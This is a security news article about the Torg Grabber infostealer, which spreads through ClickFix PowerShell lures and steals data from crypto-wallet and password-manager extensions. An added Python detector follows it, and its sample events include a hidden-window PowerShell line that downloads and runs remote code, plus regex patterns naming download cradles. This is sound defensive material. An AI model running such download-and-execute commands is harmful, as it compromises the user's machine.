New Torg Grabber Infostealer Targets 728 Crypto Wallets
New infostealer malware “Torg Grabber” is actively stealing data from 850 browser extensions, targeting 728 crypto wallet add‑ons (including MetaMask, TrustWallet, Coinbase, Binance, etc.) and also capturing credentials from 103 password manager/2FA extensions. It spreads via a ClickFix clipboard hijack that runs malicious PowerShell, uses evolving exfiltration methods (now HTTPS through Cloudflare), anti‑analysis techniques, and can bypass Chrome’s App‑Bound Encryption. The malware profiles the host, takes screenshots, steals desktop files, and can execute shellcode from its C2. Researchers note rapid development with new samples and domains weekly.

A newly identified information-stealing malware family named Torg Grabber is already making waves in the crimeware scene by plundering data from a vast ecosystem of browser extensions and crypto wallets. Researchers have observed Torg Grabber covertly harvesting sensitive information from as many as 850 browser extensions, with more than 700 of those extensions tied to cryptocurrency wallets. In practice, this means that a broad swath of wallet-related extensions—ranging from mainstream names to smaller, lesser-known projects—are within its crosshairs, exposing user credentials, tokens, and autofill data to a single malicious operator.
Initial access is gained through a technique known as ClickFix, which relies on clipboard hijacking to mislead victims into executing a tainted PowerShell command. Once the victim runs the command, the malware deploys its payload and begins exfiltrating data, backed by layered evasion and persistence strategies. Gen Digital, the cybersecurity firm tracking the campaign, notes that Torg Grabber is actively evolving: 334 unique samples were compiled in just three months, spanning December 2025 through February 2026. Under this rapid development cadence, new command-and-control (C2) servers have been registered on a near-weekly basis, signaling an expanding operator base and ongoing feature refinement.
Beyond wallets, the malware targets a broad spectrum of data sources. In addition to stealing wallet credentials, Torg Grabber is capable of ingesting data from 103 password managers and various two-factor authentication tools, as well as 19 note-taking applications. The breadth of targets underscores a design aimed at comprehensive credential harvesting and broader information exfiltration, rather than wallet theft alone.
Technical evolution and defense evasion are central to how Torg Grabber operates. In a detailed technical report, researchers describe an evolution from Telegram-based exfiltration and a custom encrypted TCP protocol to a streamlined HTTPS channel routed through Cloudflare infrastructure. This shift enables chunked data uploads and resilient payload delivery while maintaining a low network profile that blends with legitimate traffic. The malware employs multiple anti-analysis safeguards, layered obfuscation, and direct system calls with reflective loading to keep the final payload resident in memory and harder to interrupt.
A notable development milestone occurred on December 22, 2025, when Torg Grabber added an App-Bound Encryption (ABE) bypass aimed at defeating cookie protections in major browsers, including Chrome, Brave, Edge, Vivaldi, and Opera. This capability complements the malware’s other technical tricks and broadens its ability to harvest session data and other sensitive browser artifacts. In parallel with these browser-focused techniques, researchers have identified a standalone tool nicknamed Underground, used for extracting browser data. Underground injects a DLL reflectively into browsers to access the Chrome Master Encryption Key via the COM Elevation Service, a technique that mirrors methods seen in other recent information-stealer campaigns.
The scope of data theft is underscored by Torg Grabber’s extensive wallet-targeting list. The malware’s scanning covers 25 Chromium-based browsers and 8 Firefox variants, aiming to harvest credentials, cookies, and autofill data. Of the 850 extensions it targets, a staggering 728 are cryptocurrency-wallet extensions, spanning a wide range of wallet implementations, from the most widely used to niche, community-driven projects. Prominent wallet names appear in the threat’s crosshairs, including MetaMask, Phantom, Trust Wallet, Coinbase, Binance, Exodus, TronLink, Ronin, OKX, Keplr, Rabby, Sui, and Solflare, among others. The list extends deep into the long tail, capturing numerous wallets with varying adoption but a shared risk of credential leakage.
In addition to wallet-related data, Torg Grabber targets password management and authentication extensions such as LastPass, 1Password, Bitwarden, KeePass, NordPass, Dashlane, Proton Pass, Enpass, Psono, Pleasant Password Server, heylogin, 2FAAuth, GAuth, TOTP Authenticator, and Akamai MFA. The malware’s data collection scope also includes information from Discord, Telegram, Steam, VPN apps, FTP clients, email clients, desktop cryptocurrency wallet apps, and other software that can reveal sensitive operational details about the user’s digital environment.
Beyond credential theft, Torg Grabber is capable of profiling the host system. It creates a hardware fingerprint, catalogs installed software including a wide swath of antivirus tools (at least 24 are visible in its reconnaissance), and can capture screenshots of the user’s desktop. The malware is designed to exfiltrate additional data such as files from the user’s Desktop and Documents folders, further expanding the potential data-gathering surface. The payload delivery mechanism relies on ChaCha-encrypted, zlib-compressed data transmitted from the C2, enabling the attacker to deliver shellcode in a compact, resilient form while remaining difficult to detect through conventional payload analysis.
Gen Digital cautions that Torg Grabber is still in a high-velocity state of development. The operator base is expanding, and new C2 domains are registered weekly, with at least 40 unique tags identified in the course of the latest analysis. This combination of aggressive expansion, broad target scope, and sophisticated evasion places Torg Grabber among the more notable information-stealer campaigns observed in the wild during late 2025 and early 2026.
Contextual notes from related security research indicate that threats like Torg Grabber are part of a broader pattern in which attackers increasingly blend browser data theft with wallet-specific espionage. The rapid adoption of cloud-based exfiltration channels and encrypted data transfers highlights the evolving risk landscape for individuals who reuse passwords across wallet and authentication tools, as well as for organizations that rely on browser-based crypto workflows. As the threat continues to mature, defenders are likely to encounter more sophisticated anti-analysis techniques, reinforced in-memory payloads, and diversified data targets that stretch well beyond financial credentials into the realm of personal and organizational information.
In related industry reportage, analysts emphasize that such families reflect a trend toward highly modular, extensible infostealers that can adapt to target ecosystems with minimal operational downtime. The combination of clipboard-based initial access, broad extension targeting, and cloud-enabled exfiltration makes early detection challenging, as the malware can blend into normal browser traffic and legitimate Cloudflare-protected channels. For security teams, the implications are clear: protection must extend beyond password hygiene and wallet security to include robust endpoint telemetry, browser extension vetting, and network monitoring capable of spotting anomalous, high-volume data exfiltration patterns even when the traffic appears benign.
As this campaign continues to unfold, organizations and individuals who engage in cryptocurrency activities should remain vigilant about the integrity of their browser environments, the authenticity of any extensions installed, and the security posture of systems that manage sensitive credentials and authentication data. Regular software updates, careful review of installed extensions, and prompt incident response when suspicious PowerShell activity or clipboard anomalies are detected will be essential components of a resilient defensive strategy in the face of evolving infostealer threats like Torg Grabber.
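As an added example (not from the article or from Gen Digital's report), a small Python detector that scores process-creation events for the ClickFix pattern described above: PowerShell launched directly from the interactive desktop shell with window-hiding, encoding or download-cradle switches. The event records are constructed for illustration, and the choice of explorer.exe as the parent of a pasted command is an assumption.

```python
import re

# Assumption: a command the victim pastes and runs lands under the desktop shell.
INTERACTIVE_PARENTS = {"explorer.exe"}
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# (indicator name, regex) pairs checked case-insensitively against the command line.
INDICATORS = [
    ("hidden_window", re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)),
    ("no_profile", re.compile(r"-nop(?:rofile)?\b", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|nc|ncodedcommand)\b", re.I)),
    ("exec_policy_bypass", re.compile(r"-e(?:xecutionpolicy|p)\s+bypass\b", re.I)),
    ("download_cradle", re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I)),
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
]

# Constructed, simplified process-creation records (Sysmon Event ID 1 style), not real telemetry.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -nop -c \"iex (iwr 'https://example.invalid/x' -UseBasicParsing)\""},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /c dir"},
    {"parent": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -File C:\\scripts\\backup.ps1"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -w hidden -enc <BASE64_PLACEHOLDER>"},
]

def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def score_event(event: dict) -> tuple[list[str], bool]:
    """Return the indicator names hit and whether the event looks ClickFix-like."""
    hits = [name for name, rx in INDICATORS if rx.search(event["cmdline"])]
    is_powershell = basename(event["image"]) in POWERSHELL_IMAGES
    from_shell = basename(event["parent"]) in INTERACTIVE_PARENTS
    # Require PowerShell spawned by the desktop shell plus at least two indicators;
    # scheduled or scripted automation normally has a different parent and fewer hits.
    return hits, (is_powershell and from_shell and len(hits) >= 2)

def find_clickfix_candidates(events: list[dict]) -> list[dict]:
    """Filter events down to those worth an analyst's attention."""
    return [{"cmdline": ev["cmdline"], "indicators": hits}
            for ev in events for hits, flagged in [score_event(ev)] if flagged]
```

On the constructed sample the first and last events are flagged; the plain cmd invocation and the script run from pwsh are not.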